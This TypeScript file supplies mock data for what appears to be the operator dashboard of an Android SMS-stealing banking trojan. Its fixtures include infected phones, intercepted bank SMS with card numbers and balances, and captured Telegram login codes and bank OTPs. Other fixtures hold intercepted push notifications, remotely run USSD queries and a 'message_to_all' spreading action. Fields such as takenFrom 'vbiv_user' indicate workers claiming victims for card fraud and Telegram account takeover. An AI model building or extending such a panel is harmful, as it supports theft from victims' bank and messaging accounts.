import type { IBalance } from '@/entities/balance.entity';
import type { ICardListItem } from '@/entities/card.entity';
import type { IClient, IClientMessage, IClientPush, IClientDeviceLog, IClientUssd, IPhone, IClientAction, IInstalledApp } from '@/entities/client.entity';
import type { IDeviceLog } from '@/entities/device-log.entity';
import type { IMessage } from '@/entities/message.entity';
import type { IPush } from '@/entities/push.entity';
import type { IUssd } from '@/entities/ussd.entity';
import type { IPhoneListItem } from '@/entities/phone.entity';
import type { IMyClient } from '@/entities/my-clients-entity';
import type { IMyCode } from '@/entities/my-codes-entity';
import type { IProfile } from '@/entities/profile-entity';

const now = Date.now();
const hour = 60 * 60 * 1000;

function phone(
	clientId: string,
	buildId: string,
	number: string | undefined,
	subId: string,
	name: string,
	status: 0 | 1 | 2 = 1,
	extras?: Pick<IPhone, 'simSlotIndex' | 'isDefault' | 'countryIso'>,
): IPhone {
	return {
		id: Number(subId),
		clientId,
		buildId,
		number,
		subId,
		name,
		status,
		createdAt: new Date(now - hour).toISOString(),
		...extras,
	};
}

export const mockProfile: IProfile = {
	id: 1,
	userId: 1001,
	role: 'admin',
	nickname: 'dev_account',
	profitAmount: 12500,
	profitCount: 7,
	createdAt: now - 30 * 24 * hour,
};

export const mockMyClients: IMyClient[] = [
	{
		id: 'c1001',
		buildId: 'build-a',
		profileId: 1,
		profileNickname: 'dev_account',
		tgStatus: 'notset',
		sdkVersion: '34',
		phone: '+79001234567',
		fileName: 'c1001.zip',
		takeStatus: 0,
		isOnline: true,
		onlineAt: now - 2 * 60 * 1000,
		phones: [
			{ number: '+79001234567', subId: '1', name: 'SIM 1' },
			{ number: '+79007654321', subId: '2', name: 'SIM 2' },
		],
		createdAt: now - 3 * hour,
	},
	{
		id: 'c1002',
		buildId: 'build-a',
		profileId: 1,
		profileNickname: 'dev_account',
		tgStatus: 'used',
		sdkVersion: '33',
		phone: '+380501112233',
		takeStatus: 1,
		takenFrom: 'vbiv_user',
		comment: 'Ждём код',
		isOnline: true,
		onlineAt: now - 5 * 60 * 1000,
		phones: [{ number: '+380501112233', subId: '1', name: 'SIM 1' }],
		createdAt: now - 5 * hour,
	},
	{
		id: 'c1003',
		buildId: 'build-b',
		profileId: 1,
		profileNickname: 'dev_account',
		tgStatus: 'woutcode',
		sdkVersion: '31',
		phone: '+77015556677',
		takeStatus: 0,
		isOnline: false,
		onlineAt: now - 2 * hour,
		phones: [{ number: '+77015556677', subId: '1', name: 'SIM 1' }],
		createdAt: now - 8 * hour,
	},
	{
		id: 'c1004',
		buildId: 'build-b',
		profileId: 1,
		profileNickname: 'dev_account',
		tgStatus: '2fa',
		sdkVersion: '34',
		phone: undefined,
		takeStatus: 0,
		isOnline: false,
		onlineAt: now - 12 * hour,
		phones: [{ number: undefined, subId: '1', name: 'SIM 1' }],
		createdAt: now - 14 * hour,
	},
	{
		id: 'c1005',
		buildId: 'build-c',
		profileId: 1,
		profileNickname: 'dev_account',
		tgStatus: 'notset',
		sdkVersion: '29',
		phone: '+998901234567',
		fileName: 'c1005.zip',
		takeStatus: 2,
		comment: 'Повторный заход',
		isOnline: true,
		onlineAt: now - 30 * 1000,
		phones: [{ number: '+998901234567', subId: '1', name: 'SIM 1' }],
		createdAt: now - hour,
	},
	{
		id: 'c1006',
		buildId: 'build-c',
		profileId: 1,
		profileNickname: 'dev_account',
		tgStatus: 'used',
		sdkVersion: '34',
		phone: '+79161112233',
		takeStatus: 0,
		isOnline: false,
		onlineAt: now - 6 * hour,
		phones: [
			{ number: '+79161112233', subId: '1', name: 'SIM 1' },
			{ number: '+79164445566', subId: '2', name: 'SIM 2' },
		],
		createdAt: now - 20 * hour,
	},
	{
		id: 'c1007',
		buildId: 'build-a',
		profileId: 1,
		profileNickname: 'dev_account',
		tgStatus: 'notset',
		sdkVersion: '32',
		phone: '+375291112233',
		takeStatus: 3,
		isOnline: true,
		onlineAt: now - 10 * 60 * 1000,
		phones: [{ number: '+375291112233', subId: '1', name: 'SIM 1' }],
		createdAt: now - 4 * hour,
	},
	{
		id: 'c1008',
		buildId: 'build-b',
		profileId: 1,
		profileNickname: 'dev_account',
		tgStatus: 'woutcode',
		sdkVersion: '34',
		phone: '+447700900123',
		takeStatus: 0,
		isOnline: false,
		onlineAt: now - 24 * hour,
		phones: [{ number: '+447700900123', subId: '1', name: 'SIM 1' }],
		createdAt: now - 36 * hour,
	},
];

export const mockClients: IClient[] = mockMyClients.map((c, index) => ({
	id: c.id,
	buildId: c.buildId,
	profileId: c.profileId,
	profileNickname: c.profileNickname,
	newLaunchStatus: (index % 3) as 0 | 1 | 2,
	tgStatus: c.tgStatus,
	sdkVersion: c.sdkVersion,
	...(c.id === 'c1001'
		? {
				deviceName: 'My Pixel',
				brand: 'Google',
				model: 'Pixel 8',
				androidRelease: '14',
				locale: 'ru-RU',
				timezone: 'Asia/Tashkent',
				contactsCount: 42,
				protocolVersion: 2,
			}
		: {}),
	...(c.id === 'c1005'
		? {
				deviceName: 'Galaxy A54',
				brand: 'samsung',
				model: 'SM-A546B',
				androidRelease: '13',
				locale: 'uz-UZ',
				timezone: 'Asia/Samarkand',
				contactsCount: 128,
				protocolVersion: 2,
			}
		: {}),
	phone: c.phone,
	fileName: c.fileName,
	phones:
		c.id === 'c1001'
			? [
					phone(c.id, c.buildId, '+79001234567', '1', 'SIM 1', 1, { simSlotIndex: 0, isDefault: true, countryIso: 'ru' }),
					phone(c.id, c.buildId, '+79007654321', '2', 'SIM 2', 1, { simSlotIndex: 1, isDefault: false, countryIso: 'ru' }),
				]
			: c.id === 'c1005'
				? [phone(c.id, c.buildId, '+998901234567', '1', 'SIM 1', 1, { simSlotIndex: 0, isDefault: true, countryIso: 'uz' })]
				: c.phones.map(p => phone(c.id, c.buildId, p.number, p.subId, p.name)),
	cards:
		index % 2 === 0
			? [
					{
						id: 100 + index,
						clientId: c.id,
						buildId: c.buildId,
						number: `4276****${1000 + index}`,
						date: '12/28',
						balance: 15000 + index * 1200,
						createdAt: new Date(now - hour).toISOString(),
					},
				]
			: [],
	possibleCards: index % 3 === 0 ? [`2202****${2000 + index}`] : [],
	appsCount: 3,
	takeStatus: c.takeStatus,
	takenFrom: c.takenFrom,
	comment: c.comment,
	isOnline: c.isOnline,
	onlineAt: c.onlineAt,
	createdAt: c.createdAt,
}));

export const mockBalances: IBalance[] = [
	{
		id: 1,
		clientId: 'c1001',
		buildId: 'build-a',
		sender: '900',
		text: 'Баланс карты *1234: 15230.50 RUB',
		cardNumber: '4276****1234',
		cardBalance: 15230.5,
		fallbackAmount: 0,
		takeStatus: 0,
		createdAt: new Date(now - 20 * 60 * 1000).toISOString(),
	},
	{
		id: 2,
		clientId: 'c1002',
		buildId: 'build-a',
		sender: 'Bank',
		text: 'Пополнение +5000. Доступно 8200',
		cardNumber: '2202****5678',
		cardBalance: 8200,
		fallbackAmount: 5000,
		takeStatus: 1,
		takenFrom: 'vbiv_user',
		comment: 'На вбиве',
		createdAt: new Date(now - 40 * 60 * 1000).toISOString(),
	},
	{
		id: 3,
		clientId: 'c1003',
		buildId: 'build-b',
		sender: 'Kaspi',
		text: 'Остаток: 45000 KZT',
		cardNumber: '4400****9012',
		cardBalance: 45000,
		fallbackAmount: 0,
		takeStatus: 0,
		createdAt: new Date(now - 2 * hour).toISOString(),
	},
	{
		id: 4,
		clientId: 'c1005',
		buildId: 'build-c',
		sender: '8600',
		text: 'Balans: 1 250 000 UZS',
		cardNumber: '8600****3456',
		cardBalance: 1250000,
		fallbackAmount: 0,
		takeStatus: 2,
		createdAt: new Date(now - 50 * 60 * 1000).toISOString(),
	},
	{
		id: 5,
		clientId: 'c1006',
		buildId: 'build-c',
		sender: 'Tinkoff',
		text: 'Списание 3500. Остаток 910.12',
		cardNumber: '5536****7890',
		cardBalance: 910.12,
		fallbackAmount: 3500,
		takeStatus: 0,
		createdAt: new Date(now - 5 * hour).toISOString(),
	},
	{
		id: 6,
		clientId: 'c1007',
		buildId: 'build-a',
		sender: 'Priorbank',
		text: 'Dostupno 320.00 BYN',
		cardNumber: '9112****1111',
		cardBalance: 320,
		fallbackAmount: 0,
		takeStatus: 3,
		createdAt: new Date(now - 3 * hour).toISOString(),
	},
	{
		id: 7,
		clientId: 'c1001',
		buildId: 'build-a',
		sender: 'Sber',
		text: 'MIR *4321 баланс 6400.00',
		cardNumber: '2202****4321',
		cardBalance: 6400,
		fallbackAmount: 0,
		takeStatus: 0,
		createdAt: new Date(now - 6 * hour).toISOString(),
	},
	{
		id: 8,
		clientId: 'c1008',
		buildId: 'build-b',
		sender: 'Revolut',
		text: 'Balance GBP 84.20',
		cardNumber: '5168****2222',
		cardBalance: 84.2,
		fallbackAmount: 0,
		takeStatus: 0,
		createdAt: new Date(now - 10 * hour).toISOString(),
	},
];

export const mockCards: ICardListItem[] = mockClients.flatMap(c =>
	(c.cards ?? []).map(card => ({
		...card,
		balance: card.balance ?? 0,
		takeStatus: c.takeStatus,
		takenFrom: c.takenFrom,
	})),
);

export const mockPhones: IPhoneListItem[] = mockClients.flatMap(c =>
	(c.phones ?? []).map(p => ({
		id: p.id,
		clientId: p.clientId,
		buildId: p.buildId,
		number: p.number,
		subId: p.subId,
		name: p.name,
		status: p.status,
		createdAt: p.createdAt,
		takeStatus: c.takeStatus,
		takenFrom: c.takenFrom,
	})),
);

export const mockCodes: IMyCode[] = [
	{
		id: 1,
		clientId: 'c1001',
		buildId: 'build-a',
		sender: 'Telegram',
		text: 'Login code: 48291',
		code: '48291',
		createdAt: now - 15 * 60 * 1000,
	},
	{
		id: 2,
		clientId: 'c1001',
		buildId: 'build-a',
		sender: '900',
		text: 'Код подтверждения 193847',
		code: '193847',
		createdAt: now - 45 * 60 * 1000,
	},
	{
		id: 3,
		clientId: 'c1002',
		buildId: 'build-a',
		sender: 'Telegram',
		text: 'Your code is 77120',
		code: '77120',
		createdAt: now - 25 * 60 * 1000,
	},
	{
		id: 4,
		clientId: 'c1005',
		buildId: 'build-c',
		sender: 'Bank',
		text: 'OTP: 559013',
		code: '559013',
		createdAt: now - hour,
	},
	{
		id: 5,
		clientId: 'c1007',
		buildId: 'build-a',
		sender: 'Telegram',
		text: 'Code 33011',
		code: '33011',
		createdAt: now - 2 * hour,
	},
];

export const mockMessages: IClientMessage[] = [
	{
		id: 1,
		clientId: 'c1001',
		sender: '900',
		text: 'Добрый день, ваш заказ готов',
		createdAt: now - 30 * 60 * 1000,
	},
	{
		id: 2,
		clientId: 'c1001',
		sender: 'Telegram',
		text: 'Пароль для входа: temp123',
		createdAt: now - hour,
	},
	{
		id: 3,
		clientId: 'c1002',
		sender: 'Bank',
		text: 'Запрос на перевод ожидает подтверждения',
		createdAt: now - 50 * 60 * 1000,
	},
	{
		id: 4,
		clientId: 'c1005',
		sender: 'Tinkoff',
		text: 'Ваш баланс пополнен',
		createdAt: now - 90 * 60 * 1000,
	},
];

export const mockGlobalMessages: IMessage[] = [
	{
		id: 1,
		clientId: 'c1001',
		buildId: 'build-a',
		sender: '900',
		text: 'Добрый день, ваш заказ готов',
		takeStatus: 1,
		takenFrom: 'worker1',
		comment: 'VIP',
		createdAt: now - 30 * 60 * 1000,
	},
	{
		id: 2,
		clientId: 'c1001',
		buildId: 'build-a',
		sender: 'Telegram',
		text: 'Пароль для входа: temp123',
		createdAt: now - hour,
	},
	{
		id: 3,
		clientId: 'c1002',
		buildId: 'build-b',
		sender: 'Bank',
		text: 'Запрос на перевод ожидает подтверждения',
		createdAt: now - 50 * 60 * 1000,
	},
	{
		id: 4,
		clientId: 'c1005',
		buildId: 'build-c',
		sender: 'Tinkoff',
		text: 'Ваш баланс пополнен',
		createdAt: now - 90 * 60 * 1000,
	},
];

export const mockGlobalPushes: IPush[] = [
	{
		id: 1,
		clientId: 'c1001',
		buildId: 'build-a',
		packageName: 'org.telegram.messenger',
		title: 'Новое сообщение',
		text: 'У вас 3 непрочитанных чата',
		takeStatus: 1,
		takenFrom: 'worker1',
		comment: 'VIP',
		createdAt: now - 20 * 60 * 1000,
	},
	{
		id: 2,
		clientId: 'c1001',
		buildId: 'build-a',
		packageName: 'com.whatsapp',
		title: 'WhatsApp',
		text: 'Иван: привет, ты на связи?',
		createdAt: now - 55 * 60 * 1000,
	},
	{
		id: 3,
		clientId: 'c1002',
		buildId: 'build-b',
		packageName: 'com.idamob.tinkoff.android',
		title: 'Тинькофф',
		text: 'Поступил перевод 5000 ₽',
		createdAt: now - 35 * 60 * 1000,
	},
	{
		id: 4,
		clientId: 'c1005',
		buildId: 'build-c',
		packageName: 'ru.sberbankmobile',
		title: 'СберБанк',
		text: 'Оплата 1200 ₽ в Ozon',
		createdAt: now - 70 * 60 * 1000,
	},
];

export const mockGlobalDeviceLogs: IDeviceLog[] = [
	{
		id: 1,
		clientId: 'c1001',
		buildId: 'build-a',
		logType: 'crash',
		message: 'java.lang.NullPointerException: Attempt to invoke virtual method on a null object reference',
		stackTrace: 'at com.uzwebline.rasmlar.presentation.services.PingService.startPinging(PingService.kt:142)',
		threadName: 'main',
		occurredAt: now - 12 * 60 * 1000,
		createdAt: now - 11 * 60 * 1000,
		takeStatus: 1,
		takenFrom: 'worker1',
		comment: 'VIP',
	},
	{
		id: 2,
		clientId: 'c1002',
		buildId: 'build-b',
		logType: 'anr',
		message: 'Input dispatching timed out (Waited 5001ms for MotionEvent)',
		threadName: 'main',
		occurredAt: now - 40 * 60 * 1000,
		createdAt: now - 39 * 60 * 1000,
	},
	{
		id: 3,
		clientId: 'c1005',
		buildId: 'build-c',
		logType: 'error',
		message: 'Ping loop crashed: java.net.SocketTimeoutException',
		stackTrace: 'at okhttp3.internal.http2.Http2Stream.close(Http2Stream.kt:172)',
		threadName: 'DefaultDispatcher-worker-1',
		occurredAt: now - 75 * 60 * 1000,
		createdAt: now - 75 * 60 * 1000,
	},
];

export const mockGlobalUssds: IUssd[] = [
	{
		id: 1,
		clientId: 'c1001',
		buildId: 'build-a',
		operator: 'Beeline UZ',
		usedCommand: '*100#',
		failureCode: 0,
		response: '998901234567',
		phone: '998901234567',
		takeStatus: 1,
		takenFrom: 'worker1',
		comment: 'VIP',
		createdAt: now - 25 * 60 * 1000,
	},
	{
		id: 2,
		clientId: 'c1002',
		buildId: 'build-b',
		operator: 'Uzmobile',
		usedCommand: '*100#',
		failureCode: 0,
		response: '998909876543',
		phone: '998909876543',
		createdAt: now - 45 * 60 * 1000,
	},
	{
		id: 3,
		clientId: 'c1005',
		buildId: 'build-c',
		operator: 'Ucell',
		usedCommand: '*150#',
		failureCode: 3,
		response: 'Ошибка USSD',
		createdAt: now - 70 * 60 * 1000,
	},
];

export const mockPushes: IClientPush[] = [
	{
		id: 1,
		clientId: 'c1001',
		buildId: 'build-a',
		packageName: 'org.telegram.messenger',
		title: 'Новое сообщение',
		text: 'У вас 3 непрочитанных чата',
		createdAt: now - 20 * 60 * 1000,
	},
	{
		id: 2,
		clientId: 'c1001',
		buildId: 'build-a',
		packageName: 'com.whatsapp',
		title: 'WhatsApp',
		text: 'Иван: привет, ты на связи?',
		createdAt: now - 55 * 60 * 1000,
	},
	{
		id: 3,
		clientId: 'c1002',
		buildId: 'build-b',
		packageName: 'com.idamob.tinkoff.android',
		title: 'Тинькофф',
		text: 'Поступил перевод 5000 ₽',
		createdAt: now - 35 * 60 * 1000,
	},
	{
		id: 4,
		clientId: 'c1005',
		buildId: 'build-c',
		packageName: 'ru.sberbankmobile',
		title: 'СберБанк',
		text: 'Оплата 1200 ₽ в Ozon',
		createdAt: now - 70 * 60 * 1000,
	},
];

export const mockActions: IClientAction[] = [
	{
		id: 1,
		clientId: 'c1001',
		type: 'get_launch',
		status: 2,
		createdAt: new Date(now - 3 * hour).toISOString(),
		lastEmitAt: new Date(now - 3 * hour).toISOString(),
	},
	{
		id: 2,
		clientId: 'c1001',
		type: 'get_ussd',
		params: { subId: '1', text: '*100#' },
		status: 1,
		createdAt: new Date(now - 2 * hour).toISOString(),
		lastEmitAt: new Date(now - 2 * hour).toISOString(),
	},
	{
		id: 3,
		clientId: 'c1001',
		type: 'message_to_number',
		params: { subId: '1', phone: '+79001234567', text: 'Проверка SMS' },
		status: 0,
		createdAt: new Date(now - 30 * 60 * 1000).toISOString(),
		lastEmitAt: new Date(now - 30 * 60 * 1000).toISOString(),
	},
	{
		id: 4,
		clientId: 'c1002',
		type: 'message_to_all',
		params: { subId: '1', text: 'Тестовое сообщение' },
		status: 1,
		createdAt: new Date(now - hour).toISOString(),
		lastEmitAt: new Date(now - hour).toISOString(),
	},
	{
		id: 5,
		clientId: 'c1002',
		type: 'get_launch',
		status: 0,
		createdAt: new Date(now - 15 * 60 * 1000).toISOString(),
		lastEmitAt: new Date(now - 15 * 60 * 1000).toISOString(),
	},
];

export const mockOnlineCount = mockClients.filter(c => c.isOnline).length;

export function getMockCodesForClient(clientId: string): IMyCode[] {
	return mockCodes.filter(c => c.clientId === clientId);
}

export function getMockBalancesForClient(clientId: string): IBalance[] {
	return mockBalances.filter(b => b.clientId === clientId);
}

export function getMockMessagesForClient(clientId: string): IClientMessage[] {
	return mockMessages.filter(m => m.clientId === clientId);
}

export function getMockPushesForClient(clientId: string): IClientPush[] {
	return mockPushes.filter(p => p.clientId === clientId);
}

export function getMockDeviceLogsForClient(clientId: string): IClientDeviceLog[] {
	return mockGlobalDeviceLogs
		.filter(log => log.clientId === clientId)
		.map(({ id, clientId, buildId, logType, message, stackTrace, threadName, occurredAt, createdAt }) => ({
			id,
			clientId,
			buildId,
			logType,
			message,
			stackTrace,
			threadName,
			occurredAt,
			createdAt,
		}));
}

export function getMockUssdsForClient(clientId: string): IClientUssd[] {
	return mockGlobalUssds
		.filter(u => u.clientId === clientId)
		.map(({ id, clientId, buildId, operator, usedCommand, failureCode, response, phone, createdAt }) => ({
			id,
			clientId,
			buildId,
			operator,
			usedCommand,
			failureCode,
			response,
			phone,
			createdAt,
		}));
}

export function getMockActionsForClient(clientId: string): IClientAction[] {
	return mockActions.filter(a => a.clientId === clientId);
}

const mockApps: IInstalledApp[] = [
	{ id: 1, packageName: 'org.telegram.messenger', label: 'Telegram' },
	{ id: 2, packageName: 'com.whatsapp', label: 'WhatsApp' },
	{ id: 3, packageName: 'com.android.chrome', label: 'Chrome' },
];

export function getMockAppsForClient(): IInstalledApp[] {
	return mockApps;
}

export function paginateMockItems<T>(
	items: T[],
	params: { cursor: string | null; searchText: string; limit?: number },
	filterFn?: (item: T, query: string) => boolean,
): { items: T[]; cursor: string | null; hasMore: boolean } {
	const limit = params.limit ?? 50;
	const query = params.searchText.trim().toLowerCase();
	const filtered = query && filterFn ? items.filter(item => filterFn(item, query)) : items;
	const offset = params.cursor ? Number(params.cursor) : 0;
	const page = filtered.slice(offset, offset + limit);
	const nextOffset = offset + page.length;
	return {
		items: page,
		cursor: nextOffset < filtered.length ? String(nextOffset) : null,
		hasMore: nextOffset < filtered.length,
	};
}
